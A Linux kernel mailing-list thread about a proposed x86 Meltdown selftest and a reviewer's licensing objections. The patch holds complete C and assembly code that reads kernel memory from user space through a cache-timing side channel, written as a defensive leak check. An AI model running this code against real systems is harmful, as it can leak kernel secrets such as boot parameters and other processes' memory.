To capture potential programming errors like mistakenly setting Global bit on kernel page table entries, a selftest for meltdown is added.
This selftest is based on Pavel Boldin's work at: https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdown...
In addition to the existing test of reading kernel variable saved_command_line from user space, one more test of reading user local variable through kernel direct map address is added. For the existing test(reading saved_command_line) to report a failure, both the high kernel mapping and low kernel mapping have to be in leaked state; For the added test(read local var), only low kernel mapping leak is enough to trigger a test fail, so both tests are useful.
Test results of 10 runs:
On v6.1-rc8 with nopti kernel cmdline option:
host test_out_rate_1 test_out_rate_2 lkp-bdw-de1 50% 100% lkp-hsw-d01 70% 100% lkp-hsw-d02 0% 80% lkp-hsw-d03 60% 100% lkp-hsw-d04 20% 100% lkp-hsw-d05 60% 100% lkp-ivb-d01 0% 70% lkp-kbl-d01 100% 100% lkp-skl-d02 100% 90% lkp-skl-d03 90% 100% lkp-skl-d05 60% 100% kbl-vm 100% 80% 2 other machines have 0% rate for both tests.
bdw=broadwell, hsw=haswell, ivb=ivybridge, etc.
test_out_rate_1: test reports fail rate for the test of reading saved_command_line from user space; test_out_rate_2: test reports fail rate for the test of reading user local variable through kernel direct map address in user space.
On v5.19 without nopti cmdline option: host test_out_rate_2 lkp-bdw-de1 80% lkp-hsw-4ex1 50% lkp-hsw-d01 30% lkp-hsw-d03 10% lkp-hsw-d04 10% lkp-kbl-d01 10% kbl-vm 80% 7 other machines have 0% rate for test2.
Also tested on an i386 VM with 512M memory and the test out rate is 100% when adding nopti to kernel cmdline with v6.1-rc8.
Main changes I made from Pavel Boldin's meltdown test are: - Replace rdtscll() and clflush() with kernel's implementation; - Reimplement find_symbol_in_file() to avoid bringing in LTP's library functions; - Coding style changes: placing the function return type in the same line of the function.
Signed-off-by: Aaron Lu aaron.lu@intel.com --- Notable changes from RFC v3: - Drop RFC tag; - Change the base code from zlib licensed one to GPL licensed one.
tools/testing/selftests/x86/Makefile | 2 +- tools/testing/selftests/x86/meltdown.c | 529 +++++++++++++++++++++++++ 2 files changed, 530 insertions(+), 1 deletion(-) create mode 100644 tools/testing/selftests/x86/meltdown.c
diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile index 0388c4d60af0..36f99c360a56 100644 --- a/tools/testing/selftests/x86/Makefile +++ b/tools/testing/selftests/x86/Makefile @@ -13,7 +13,7 @@ CAN_BUILD_WITH_NOPIE := $(shell ./check_cc.sh "$(CC)" trivial_program.c -no-pie) TARGETS_C_BOTHBITS := single_step_syscall sysret_ss_attrs syscall_nt test_mremap_vdso \ check_initial_reg_state sigreturn iopl ioperm \ test_vsyscall mov_ss_trap \ - syscall_arg_fault fsgsbase_restore sigaltstack + syscall_arg_fault fsgsbase_restore sigaltstack meltdown TARGETS_C_32BIT_ONLY := entry_from_vm86 test_syscall_vdso unwind_vdso \ test_FCMOV test_FCOMI test_FISTTP \ vdso_restorer diff --git a/tools/testing/selftests/x86/meltdown.c b/tools/testing/selftests/x86/meltdown.c new file mode 100644 index 000000000000..fcb211dc9038 --- /dev/null +++ b/tools/testing/selftests/x86/meltdown.c @@ -0,0 +1,529 @@ +// SPDX-License-Identifier: GPL-2.0-or-later +/* + * Copyright (c) 2018 Pavel Boldin pboldin@cloudlinux.com + * https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdown... + */ + +#define _GNU_SOURCE +#include <stdio.h> +#include <stdlib.h> +#include <stdint.h> +#include <stdarg.h> +#include <string.h> +#include <signal.h> +#include <ucontext.h> +#include <unistd.h> +#include <fcntl.h> +#include <ctype.h> +#include <sys/utsname.h> +#include <sys/mman.h> + +#define PAGE_SHIFT 12 +#define PAGE_SIZE 0x1000 +#define PUD_SHIFT 30 +#define PUD_SIZE (1UL << PUD_SHIFT) +#define PUD_MASK (~(PUD_SIZE - 1)) + +size_t cache_miss_threshold; +unsigned long directmap_base; + +#define TARGET_OFFSET 9 +#define TARGET_SIZE (1 << TARGET_OFFSET) +#define BITS_BY_READ 2 + +static inline uint64_t rdtsc(void) +{ + uint32_t eax, edx; + uint64_t tsc_val; + /* + * The lfence is to wait (on Intel CPUs) until all previous + * instructions have been executed. If software requires RDTSC to be + * executed prior to execution of any subsequent instruction, it can + * execute LFENCE immediately after RDTSC + * */ + __asm__ __volatile__("lfence; rdtsc; lfence" : "=a"(eax), "=d"(edx)); + tsc_val = ((uint64_t)edx) << 32 | eax; + return tsc_val; +} + +static inline void clflush(volatile void *__p) +{ + asm volatile("clflush %0" : "+m" (*(volatile char *)__p)); +} + +static char target_array[BITS_BY_READ * TARGET_SIZE]; + +static void clflush_target(void) +{ + int i; + + for (i = 0; i < BITS_BY_READ; i++) + clflush(&target_array[i * TARGET_SIZE]); +} + +extern char failshere[]; +extern char stopspeculate[]; + +static void __attribute__((noinline)) speculate(unsigned long addr, char bit) +{ + register char mybit asm ("cl") = bit; +#ifdef __x86_64__ + asm volatile ( + "1:\n\t" + + ".rept 300\n\t" + "add $0x141, %%rax\n\t" + ".endr\n" + + "failshere:\n\t" + "movb (%[addr]), %%al\n\t" + "ror %[bit], %%rax\n\t" + "and $1, %%rax\n\t" + "shl $9, %%rax\n\t" + "jz 1b\n\t" + + "movq (%[target], %%rax, 1), %%rbx\n" + + "stopspeculate: \n\t" + "nop\n\t" + : + : [target] "r" (target_array), + [addr] "r" (addr), + [bit] "r" (mybit) + : "rax", "rbx" + ); +#else /* defined(__x86_64__) */ + asm volatile ( + "1:\n\t" + + ".rept 300\n\t" + "add $0x141, %%eax\n\t" + ".endr\n" + + "failshere:\n\t" + "movb (%[addr]), %%al\n\t" + "ror %[bit], %%eax\n\t" + "and $1, %%eax\n\t" + "shl $9, %%eax\n\t" + "jz 1b\n\t" + + "movl (%[target], %%eax, 1), %%ebx\n" + + "stopspeculate: \n\t" + "nop\n\t" + : + : [target] "r" (target_array), + [addr] "r" (addr), + [bit] "r" (mybit) + : "rax", "ebx" + ); +#endif +} + +#ifdef __i386__ +# define REG_RIP REG_EIP +#endif + +static void sigsegv(int sig, siginfo_t *siginfo, void *context) +{ + ucontext_t *ucontext = context; + unsigned long *prip = (unsigned long *)&ucontext->uc_mcontext.gregs[REG_RIP]; + if (*prip != (unsigned long)failshere) { + printf("Segmentation fault at unexpected location %lx\n", *prip); + abort(); + } + *prip = (unsigned long)stopspeculate; + return; +} + +static int set_signal(void) +{ + struct sigaction act = { + .sa_sigaction = sigsegv, + .sa_flags = SA_SIGINFO, + }; + + return sigaction(SIGSEGV, &act, NULL); +} + +static inline int get_access_time(volatile char *addr) +{ + unsigned long long time1, time2; + volatile int j __attribute__((__unused__)); + + time1 = rdtsc(); + j = *addr; + time2 = rdtsc(); + + return time2 - time1; +} + +static int cache_hit_threshold; +static int hist[BITS_BY_READ]; + +static void check(void) +{ + int i, time; + volatile char *addr; + + for (i = 0; i < BITS_BY_READ; i++) { + addr = &target_array[i * TARGET_SIZE]; + + time = get_access_time(addr); + + if (time <= cache_hit_threshold) + hist[i]++; + } +} + +#define CYCLES 10000 +static int readbit(int fd, unsigned long addr, char bit) +{ + int i, ret; + static char buf[256]; + + memset(hist, 0, sizeof(hist)); + + for (i = 0; i < CYCLES; i++) { + /* + * Make the to-be-stolen data cache and tlb hot + * to increase success rate. + */ + ret = pread(fd, buf, sizeof(buf), 0); + if (ret < 0) + printf("[INFO]\tCan't read fd"); + + clflush_target(); + + speculate(addr, bit); + check(); + } + + if (hist[1] > CYCLES / 10) + return 1; + return 0; +} + +static int readbyte(int fd, unsigned long addr) +{ + int bit, res = 0; + + for (bit = 0; bit < 8; bit ++ ) + res |= (readbit(fd, addr, bit) << bit); + + return res; +} + +static int mysqrt(long val) +{ + int root = val / 2, prevroot = 0, i = 0; + + while (prevroot != root && i++ < 100) { + prevroot = root; + root = (val / root + root) / 2; + } + + return root; +} + +#define ESTIMATE_CYCLES 1000000 +static void set_cache_hit_threshold(void) +{ + long cached, uncached, i; + + for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++) + cached += get_access_time(target_array); + + for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++) + cached += get_access_time(target_array); + + for (uncached = 0, i = 0; i < ESTIMATE_CYCLES; i++) { + clflush(target_array); + uncached += get_access_time(target_array); + } + + cached /= ESTIMATE_CYCLES; + uncached /= ESTIMATE_CYCLES; + + cache_hit_threshold = mysqrt(cached * uncached); + + printf("[INFO]\taccess time: cached = %ld, uncached = %ld, threshold = %d\n", + cached, uncached, cache_hit_threshold); +} + +static unsigned long find_symbol_in_file(const char *filename, const char *symname) +{ + unsigned long addr; + char type, *buf; + int found; + FILE *fp; + + fp = fopen(filename, "r"); + if (!fp) { + printf("[INFO]\tFailed to open %s\n", filename); + return 0; + } + + buf = malloc(4096); + if (!buf) + return 0; + + found = 0; + while (fscanf(fp, "%lx %c %s\n", &addr, &type, buf)) { + if (!strcmp(buf, symname)) { + found = 1; + break; + } + } + + free(buf); + fclose(fp); + + return found ? addr : 0; +} + +static unsigned long find_kernel_symbol(const char *name) +{ + char systemmap[256]; + struct utsname utsname; + unsigned long addr; + + addr = find_symbol_in_file("/proc/kallsyms", name); + if (addr) + return addr; + + if (uname(&utsname) < 0) + return 0; + sprintf(systemmap, "/boot/System.map-%s", utsname.release); + addr = find_symbol_in_file(systemmap, name); + return addr; +} + +static unsigned long saved_cmdline_addr; +static int spec_fd; + +#define READ_SIZE 32 + +static int test_read_saved_command_line(void) +{ + unsigned int i, score = 0, ret; + unsigned long addr; + unsigned long size; + char read[READ_SIZE] = { 0 }; + char expected[READ_SIZE] = { 0 }; + int expected_len; + + saved_cmdline_addr = find_kernel_symbol("saved_command_line"); + if (!saved_cmdline_addr) { + printf("[SKIP]\tCan not find symbol saved_command_line\n"); + return 0; + } + printf("[INFO]\tsaved_cmdline_addr: 0x%lx\n", saved_cmdline_addr); + + spec_fd = open("/proc/cmdline", O_RDONLY); + if (spec_fd == -1) { + printf("[SKIP]\tCan not open /proc/cmdline\n"); + return 0; + } + + expected_len = pread(spec_fd, expected, sizeof(expected), 0); + if (expected_len < 0) { + printf("[SKIP]\tCan't read /proc/cmdline\n"); + return 0; + } + + /* read address of saved_cmdline_addr */ + addr = saved_cmdline_addr; + size = sizeof(addr); + for (i = 0; i < size; i++) { + ret = readbyte(spec_fd, addr); + read[i] = ret; + addr++; + } + + /* read value pointed to by saved_cmdline_addr */ + memcpy(&addr, read, sizeof(addr)); + memset(read, 0, sizeof(read)); + printf("[INFO]\tsaved_command_line: 0x%lx\n", addr); + size = expected_len; + + if (!addr) + goto done; + + for (i = 0; i < size; i++) { + ret = readbyte(spec_fd, addr); + read[i] = ret; + addr++; + } + + for (i = 0; i < size; i++) + if (expected[i] == read[i]) + score++; + +done: + if (score > size / 2) { + printf("[FAIL]\ttest_read_saved_command_line: both high and low kernel mapping leak found.\n"); + ret = -1; + } else { + printf("[OK]\ttest_read_saved_command_line: no leak found.\n"); + ret = 0; + } + + close(spec_fd); + + return ret; +} + +static int get_directmap_base(void) +{ + char *buf; + FILE *fp; + size_t n; + int ret; + + fp = fopen("/sys/kernel/debug/page_tables/kernel", "r"); + if (!fp) + return -1; + + buf = NULL; + ret = -1; + while (getline(&buf, &n, fp) != -1) { + if (!strstr(buf, "Kernel Mapping")) + continue; + + if (getline(&buf, &n, fp) != -1 && + sscanf(buf, "0x%lx", &directmap_base) == 1) { + printf("[INFO]\tdirectmap_base=0x%lx/0x%lx\n", directmap_base, directmap_base & PUD_MASK); + directmap_base &= PUD_MASK; + ret = 0; + break; + } + } + + fclose(fp); + free(buf); + return ret; +} + +static int virt_to_phys(unsigned long virt, unsigned long *phys) +{ + unsigned long pfn; + uint64_t val; + int fd, ret; + + fd = open("/proc/self/pagemap", O_RDONLY); + if (fd == -1) { + printf("[INFO]\tFailed to open pagemap\n"); + return -1; + } + + ret = pread(fd, &val, sizeof(val), (virt >> PAGE_SHIFT) * sizeof(uint64_t)); + if (ret == -1) { + printf("[INFO]\tFailed to read pagemap\n"); + goto out; + } + + if (!(val & (1ULL << 63))) { + printf("[INFO]\tPage not present according to pagemap\n"); + ret = -1; + goto out; + } + + pfn = val & ((1ULL << 55) - 1); + if (pfn == 0) { + printf("[INFO]\tNeed CAP_SYS_ADMIN to show pfn\n"); + ret = -1; + goto out; + } + + ret = 0; + *phys = (pfn << PAGE_SHIFT) | (virt & (PAGE_SIZE - 1)); + +out: + close(fd); + return ret; +} + +static int test_read_local_var(void) +{ + char path[] = "/tmp/meltdown.XXXXXX"; + char string[] = "test string"; + unsigned long phys; + int i, len, ret; + char *result; + void *p; + + if (get_directmap_base() == -1) { + printf("[SKIP]\tFailed to get directmap base. Need root and CONFIG_PTDUMP_DEBUGFS\n"); + return 0; + } + + spec_fd = mkstemp(path); + if (spec_fd == -1) { + printf("[SKIP]\tCan not open %s\n", path); + return 0; + } + ftruncate(spec_fd, 0x1000); + + p = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, spec_fd, 0); + if (p == MAP_FAILED) { + printf("[SKIP]\tmmap spec_fd failed\n"); + return 0; + } + memcpy(p, string, sizeof(string)); + + if (virt_to_phys((unsigned long)p, &phys) == -1) { + printf("[SKIP]\tCan not convert virtual address to physical address\n"); + return 0; + } + + len = strlen(string); + result = malloc(len + 1); + if (!result) { + printf("[SKIP]\tNot enough memory for malloc\n"); + return 0; + } + memset(result, 0, len + 1); + + for (i = 0; i < len; i++, phys++) { + result[i] = readbyte(spec_fd, directmap_base + phys); + if (result[i] == 0) + break; + } + + ret = !strncmp(string, result, len); + if (ret) + printf("[FAIL]\ttest_read_local_var: low kernel mapping leak found.\n"); + else + printf("[OK]\ttest_read_local_var: no leak found.\n"); + + free(result); + munmap(p, 0x1000); + close(spec_fd); + + return ret; +} + +int main(void) +{ + int ret1, ret2; + + printf("[RUN]\tTest if system is vulnerable to meltdown\n"); + + set_cache_hit_threshold(); + + memset(target_array, 1, sizeof(target_array)); + + if (set_signal() < 0) { + printf("[SKIP]\tCan not set handler for segfault\n"); + return 0; + } + + ret1 = test_read_local_var(); + ret2 = test_read_saved_command_line(); + + if (ret1 || ret2) + return -1; + + return 0; +}
On Thu, Jan 05, 2023 at 08:35:05PM +0800, Aaron Lu wrote:
To capture potential programming errors like mistakenly setting Global bit on kernel page table entries, a selftest for meltdown is added.
This selftest is based on Pavel Boldin's work at: https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdown...
In addition to the existing test of reading kernel variable saved_command_line from user space, one more test of reading user local variable through kernel direct map address is added. For the existing test(reading saved_command_line) to report a failure, both the high kernel mapping and low kernel mapping have to be in leaked state; For the added test(read local var), only low kernel mapping leak is enough to trigger a test fail, so both tests are useful.
Test results of 10 runs:
On v6.1-rc8 with nopti kernel cmdline option:
host test_out_rate_1 test_out_rate_2 lkp-bdw-de1 50% 100% lkp-hsw-d01 70% 100% lkp-hsw-d02 0% 80% lkp-hsw-d03 60% 100% lkp-hsw-d04 20% 100% lkp-hsw-d05 60% 100% lkp-ivb-d01 0% 70% lkp-kbl-d01 100% 100% lkp-skl-d02 100% 90% lkp-skl-d03 90% 100% lkp-skl-d05 60% 100% kbl-vm 100% 80% 2 other machines have 0% rate for both tests.
bdw=broadwell, hsw=haswell, ivb=ivybridge, etc.
test_out_rate_1: test reports fail rate for the test of reading saved_command_line from user space; test_out_rate_2: test reports fail rate for the test of reading user local variable through kernel direct map address in user space.
On v5.19 without nopti cmdline option: host test_out_rate_2 lkp-bdw-de1 80% lkp-hsw-4ex1 50% lkp-hsw-d01 30% lkp-hsw-d03 10% lkp-hsw-d04 10% lkp-kbl-d01 10% kbl-vm 80% 7 other machines have 0% rate for test2.
Also tested on an i386 VM with 512M memory and the test out rate is 100% when adding nopti to kernel cmdline with v6.1-rc8.
Main changes I made from Pavel Boldin's meltdown test are:
- Replace rdtscll() and clflush() with kernel's implementation;
- Reimplement find_symbol_in_file() to avoid bringing in LTP's library functions;
- Coding style changes: placing the function return type in the same line of the function.
Signed-off-by: Aaron Lu aaron.lu@intel.com
Notable changes from RFC v3:
- Drop RFC tag;
- Change the base code from zlib licensed one to GPL licensed one.
Sorry, but this still gets my NAK for the issues raised in previous reviews that are not addressed here for some reason :(
greg k-h
On Thu, Jan 5, 2023 at 10:42 AM Greg KH gregkh@linuxfoundation.org wrote:
On Thu, Jan 05, 2023 at 08:35:05PM +0800, Aaron Lu wrote:
To capture potential programming errors like mistakenly setting Global bit on kernel page table entries, a selftest for meltdown is added.
This selftest is based on Pavel Boldin's work at: https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdown...
In addition to the existing test of reading kernel variable saved_command_line from user space, one more test of reading user local variable through kernel direct map address is added. For the existing test(reading saved_command_line) to report a failure, both the high kernel mapping and low kernel mapping have to be in leaked state; For the added test(read local var), only low kernel mapping leak is enough to trigger a test fail, so both tests are useful.
Test results of 10 runs:
On v6.1-rc8 with nopti kernel cmdline option:
host test_out_rate_1 test_out_rate_2 lkp-bdw-de1 50% 100% lkp-hsw-d01 70% 100% lkp-hsw-d02 0% 80% lkp-hsw-d03 60% 100% lkp-hsw-d04 20% 100% lkp-hsw-d05 60% 100% lkp-ivb-d01 0% 70% lkp-kbl-d01 100% 100% lkp-skl-d02 100% 90% lkp-skl-d03 90% 100% lkp-skl-d05 60% 100% kbl-vm 100% 80% 2 other machines have 0% rate for both tests.
bdw=broadwell, hsw=haswell, ivb=ivybridge, etc.
test_out_rate_1: test reports fail rate for the test of reading saved_command_line from user space; test_out_rate_2: test reports fail rate for the test of reading user local variable through kernel direct map address in user space.
On v5.19 without nopti cmdline option: host test_out_rate_2 lkp-bdw-de1 80% lkp-hsw-4ex1 50% lkp-hsw-d01 30% lkp-hsw-d03 10% lkp-hsw-d04 10% lkp-kbl-d01 10% kbl-vm 80% 7 other machines have 0% rate for test2.
Also tested on an i386 VM with 512M memory and the test out rate is 100% when adding nopti to kernel cmdline with v6.1-rc8.
Main changes I made from Pavel Boldin's meltdown test are:
- Replace rdtscll() and clflush() with kernel's implementation;
- Reimplement find_symbol_in_file() to avoid bringing in LTP's library functions;
- Coding style changes: placing the function return type in the same line of the function.
Signed-off-by: Aaron Lu aaron.lu@intel.com
Notable changes from RFC v3:
- Drop RFC tag;
- Change the base code from zlib licensed one to GPL licensed one.
Sorry, but this still gets my NAK for the issues raised in previous reviews that are not addressed here for some reason :(
Greg, the selftest is no longer based on https://github.com/IAIK/meltdown/blob/master/LICENSE, which is originally zlib licensed. In this version, Aaron is basing the test on https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdown..., which is indeed licensed with: GPL-2.0-or-later
greg k-h
On Thu, Jan 05, 2023 at 11:11:15AM -0300, Raphael S. Carvalho wrote:
On Thu, Jan 5, 2023 at 10:42 AM Greg KH gregkh@linuxfoundation.org wrote:
On Thu, Jan 05, 2023 at 08:35:05PM +0800, Aaron Lu wrote:
To capture potential programming errors like mistakenly setting Global bit on kernel page table entries, a selftest for meltdown is added.
This selftest is based on Pavel Boldin's work at: https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdown...
In addition to the existing test of reading kernel variable saved_command_line from user space, one more test of reading user local variable through kernel direct map address is added. For the existing test(reading saved_command_line) to report a failure, both the high kernel mapping and low kernel mapping have to be in leaked state; For the added test(read local var), only low kernel mapping leak is enough to trigger a test fail, so both tests are useful.
Test results of 10 runs:
On v6.1-rc8 with nopti kernel cmdline option:
host test_out_rate_1 test_out_rate_2 lkp-bdw-de1 50% 100% lkp-hsw-d01 70% 100% lkp-hsw-d02 0% 80% lkp-hsw-d03 60% 100% lkp-hsw-d04 20% 100% lkp-hsw-d05 60% 100% lkp-ivb-d01 0% 70% lkp-kbl-d01 100% 100% lkp-skl-d02 100% 90% lkp-skl-d03 90% 100% lkp-skl-d05 60% 100% kbl-vm 100% 80% 2 other machines have 0% rate for both tests.
bdw=broadwell, hsw=haswell, ivb=ivybridge, etc.
test_out_rate_1: test reports fail rate for the test of reading saved_command_line from user space; test_out_rate_2: test reports fail rate for the test of reading user local variable through kernel direct map address in user space.
On v5.19 without nopti cmdline option: host test_out_rate_2 lkp-bdw-de1 80% lkp-hsw-4ex1 50% lkp-hsw-d01 30% lkp-hsw-d03 10% lkp-hsw-d04 10% lkp-kbl-d01 10% kbl-vm 80% 7 other machines have 0% rate for test2.
Also tested on an i386 VM with 512M memory and the test out rate is 100% when adding nopti to kernel cmdline with v6.1-rc8.
Main changes I made from Pavel Boldin's meltdown test are:
- Replace rdtscll() and clflush() with kernel's implementation;
- Reimplement find_symbol_in_file() to avoid bringing in LTP's library functions;
- Coding style changes: placing the function return type in the same line of the function.
Signed-off-by: Aaron Lu aaron.lu@intel.com
Notable changes from RFC v3:
- Drop RFC tag;
- Change the base code from zlib licensed one to GPL licensed one.
Sorry, but this still gets my NAK for the issues raised in previous reviews that are not addressed here for some reason :(
Greg, the selftest is no longer based on https://github.com/IAIK/meltdown/blob/master/LICENSE, which is originally zlib licensed. In this version, Aaron is basing the test on https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdown..., which is indeed licensed with: GPL-2.0-or-later
That's not what the submission looks like, it looks a lot like the last one from the first defines and variables...
But hey, what do I know, I'm not a lawyer which is why I keep insisting that one from Intel actually read over this submission and sign-off on it to verify that they agree with all of this.
thanks,
greg k-h
On 1/5/23 06:38, Greg KH wrote:
But hey, what do I know, I'm not a lawyer which is why I keep insisting that one from Intel actually read over this submission and sign-off on it to verify that they agree with all of this.
I guess I'm still confused what is triggering the lawyer requirement. Last time, you asked:
You are taking source from a non-Intel developer under a different license and adding copyright and different license information to it. Because of all of that, I have the requirement that I want to know that Intel legal has vetted all of this and agrees with the conclusions that you all are stating.
To break that down, the earlier submission[1] had:
* Original developer from a different company * Non-GPL original license * Relicensing * Addition of a new copyright
I can see all of those thing adding up together to trigger the higher bar of having a lawyer sign off. It looks like Aaron took that issue list and tried to improve on it. This new submission has:
* Original developer from a different company
Is there anything else in this submission which is triggering the lawyer review requirement?
If not, I'd be happy to hack up a Documentation patch to describe this review requirement and make it clear to everyone. I've gotten traction with my colleagues in the past once things were fully and clearly documented. I'm hoping history repeats itself here.
1. https://lore.kernel.org/all/Y3L2Jx3Kx9q8Dv55@ziqianlu-desk1/
Hi Greg,
On Thu, Jan 05, 2023 at 03:38:30PM +0100, Greg KH wrote:
On Thu, Jan 05, 2023 at 11:11:15AM -0300, Raphael S. Carvalho wrote:
On Thu, Jan 5, 2023 at 10:42 AM Greg KH gregkh@linuxfoundation.org wrote:
On Thu, Jan 05, 2023 at 08:35:05PM +0800, Aaron Lu wrote:
To capture potential programming errors like mistakenly setting Global bit on kernel page table entries, a selftest for meltdown is added.
This selftest is based on Pavel Boldin's work at: https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdown...
In addition to the existing test of reading kernel variable saved_command_line from user space, one more test of reading user local variable through kernel direct map address is added. For the existing test(reading saved_command_line) to report a failure, both the high kernel mapping and low kernel mapping have to be in leaked state; For the added test(read local var), only low kernel mapping leak is enough to trigger a test fail, so both tests are useful.
Test results of 10 runs:
On v6.1-rc8 with nopti kernel cmdline option:
host test_out_rate_1 test_out_rate_2 lkp-bdw-de1 50% 100% lkp-hsw-d01 70% 100% lkp-hsw-d02 0% 80% lkp-hsw-d03 60% 100% lkp-hsw-d04 20% 100% lkp-hsw-d05 60% 100% lkp-ivb-d01 0% 70% lkp-kbl-d01 100% 100% lkp-skl-d02 100% 90% lkp-skl-d03 90% 100% lkp-skl-d05 60% 100% kbl-vm 100% 80% 2 other machines have 0% rate for both tests.
bdw=broadwell, hsw=haswell, ivb=ivybridge, etc.
test_out_rate_1: test reports fail rate for the test of reading saved_command_line from user space; test_out_rate_2: test reports fail rate for the test of reading user local variable through kernel direct map address in user space.
On v5.19 without nopti cmdline option: host test_out_rate_2 lkp-bdw-de1 80% lkp-hsw-4ex1 50% lkp-hsw-d01 30% lkp-hsw-d03 10% lkp-hsw-d04 10% lkp-kbl-d01 10% kbl-vm 80% 7 other machines have 0% rate for test2.
Also tested on an i386 VM with 512M memory and the test out rate is 100% when adding nopti to kernel cmdline with v6.1-rc8.
Main changes I made from Pavel Boldin's meltdown test are:
- Replace rdtscll() and clflush() with kernel's implementation;
- Reimplement find_symbol_in_file() to avoid bringing in LTP's library functions;
- Coding style changes: placing the function return type in the same line of the function.
Signed-off-by: Aaron Lu aaron.lu@intel.com
Notable changes from RFC v3:
- Drop RFC tag;
- Change the base code from zlib licensed one to GPL licensed one.
Sorry, but this still gets my NAK for the issues raised in previous reviews that are not addressed here for some reason :(
Greg, the selftest is no longer based on https://github.com/IAIK/meltdown/blob/master/LICENSE, which is originally zlib licensed. In this version, Aaron is basing the test on https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdown..., which is indeed licensed with: GPL-2.0-or-later
That's not what the submission looks like, it looks a lot like the last one from the first defines and variables...
But hey, what do I know, I'm not a lawyer which is why I keep insisting that one from Intel actually read over this submission and sign-off on it to verify that they agree with all of this.
As Raphael has kindly clarified for me, I'm now taking GPL-2.0-or-later licensed code and did some modifications and then released it as GPL-2.0-or-later, I suppose this is legally a right thing to do for anyone?
If you do not trust what I've done is what I've claimed, now the original author Pavel Boldin has given the patch a "LGTM" tag, does that address your concern?
Thanks, Aaron
On Fri, Jan 06, 2023 at 09:00:21AM +0800, Aaron Lu wrote:
If you do not trust what I've done is what I've claimed, now the original author Pavel Boldin has given the patch a "LGTM" tag, does that address your concern?
I don't see that anywhere on lore.kernel.org, have a link to it?
thanks,
greg k-h
On Sat, Jan 07, 2023 at 10:18, Greg KH gregkh@linuxfoundation.org:
On Fri, Jan 06, 2023 at 09:00:21AM +0800, Aaron Lu wrote:
If you do not trust what I've done is what I've claimed, now the original author Pavel Boldin has given the patch a "LGTM" tag, does that address your concern?
I don't see that anywhere on lore.kernel.org, have a link to it?
LGTM.
Cc: Igor Seletskiy i@cloudlinux.com
-- Pavel Boldin
P.S.: Sorry for the mess, gmail app can't send plaintext.
Hi Pavel,
On Sat, Jan 07, 2023 at 10:50:44AM +0200, Pavel Boldin wrote:
On Sat, Jan 07, 2023 at 10:18, Greg KH gregkh@linuxfoundation.org:
On Fri, Jan 06, 2023 at 09:00:21AM +0800, Aaron Lu wrote:
If you do not trust what I've done is what I've claimed, now the original author Pavel Boldin has given the patch a "LGTM" tag, does that address your concern?
I don't see that anywhere on lore.kernel.org, have a link to it?
LGTM.
Thanks for the review.
In Linux kernel community, reviewer normally gives a Reviewed-by tag when they think the patch "LGTM". And in this case, it would be a tag like this:
Reviewed-by: Pavel Boldin boldin.pavel@gmail.com
May I translate your "LGTM" tag to the above Reviewed-by tag?
BTW, the kernel community's explanation of Reviewed-by tag is here in case you want to take a look: https://docs.kernel.org/process/submitting-patches.html#reviewer-s-statement...
Thanks, Aaron
Hi Pavel,
Hope everything is well.
I wonder if you have missed my last email? Is it OK for me to add your reviewed-by tag to this patch?
Thanks.
On Mon, Jan 09, 2023 at 04:05:52PM +0800, Aaron Lu wrote:
Hi Pavel,
On Sat, Jan 07, 2023 at 10:50:44AM +0200, Pavel Boldin wrote:
On Sat, Jan 07, 2023 at 10:18, Greg KH gregkh@linuxfoundation.org:
On Fri, Jan 06, 2023 at 09:00:21AM +0800, Aaron Lu wrote:
If you do not trust what I've done is what I've claimed, now the original author Pavel Boldin has given the patch a "LGTM" tag, does that address your concern?
I don't see that anywhere on lore.kernel.org, have a link to it?
LGTM.
Thanks for the review.
In Linux kernel community, reviewer normally gives a Reviewed-by tag when they think the patch "LGTM". And in this case, it would be a tag like this:
Reviewed-by: Pavel Boldin boldin.pavel@gmail.com
May I translate your "LGTM" tag to the above Reviewed-by tag?
BTW, the kernel community's explanation of Reviewed-by tag is here in case you want to take a look: https://docs.kernel.org/process/submitting-patches.html#reviewer-s-statement...
Thanks, Aaron
On Sat, Jan 07, 2023 at 09:18:15AM +0100, Greg KH wrote:
On Fri, Jan 06, 2023 at 09:00:21AM +0800, Aaron Lu wrote:
If you do not trust what I've done is what I've claimed, now the original author Pavel Boldin has given the patch a "LGTM" tag, does that address your concern?
I don't see that anywhere on lore.kernel.org, have a link to it?
It appears Pavel Boldin's last reply didn't make it to lore for some reason but I saw him kindly replying again and I suppose you should have received it.
But just in case, the link for Pavel's new reply is here: https://lore.kernel.org/lkml/CABohvEPWBHmrRpZcQejTkZ+CYtYCyu6rFMd4doNn_CMk35...
Thanks, Aaron
Hi Greg,
On Mon, Jan 09, 2023 at 03:38:43PM +0800, Aaron Lu wrote:
On Sat, Jan 07, 2023 at 09:18:15AM +0100, Greg KH wrote:
On Fri, Jan 06, 2023 at 09:00:21AM +0800, Aaron Lu wrote:
If you do not trust what I've done is what I've claimed, now the original author Pavel Boldin has given the patch a "LGTM" tag, does that address your concern?
I don't see that anywhere on lore.kernel.org, have a link to it?
It appears Pavel Boldin's last reply didn't make it to lore for some reason but I saw him kindly replying again and I suppose you should have received it.
But just in case, the link for Pavel's new reply is here: https://lore.kernel.org/lkml/CABohvEPWBHmrRpZcQejTkZ+CYtYCyu6rFMd4doNn_CMk35...
Now with the original author Pavel Boldin's "LGTM", do you think this patch is OK to you or you still insist something else? Please kindly let me know, thanks.
On Wed, Jan 18, 2023 at 01:22:11PM +0800, Aaron Lu wrote:
Hi Greg,
On Mon, Jan 09, 2023 at 03:38:43PM +0800, Aaron Lu wrote:
On Sat, Jan 07, 2023 at 09:18:15AM +0100, Greg KH wrote:
On Fri, Jan 06, 2023 at 09:00:21AM +0800, Aaron Lu wrote:
If you do not trust what I've done is what I've claimed, now the original author Pavel Boldin has given the patch a "LGTM" tag, does that address your concern?
I don't see that anywhere on lore.kernel.org, have a link to it?
It appears Pavel Boldin's last reply didn't make it to lore for some reason but I saw him kindly replying again and I suppose you should have received it.
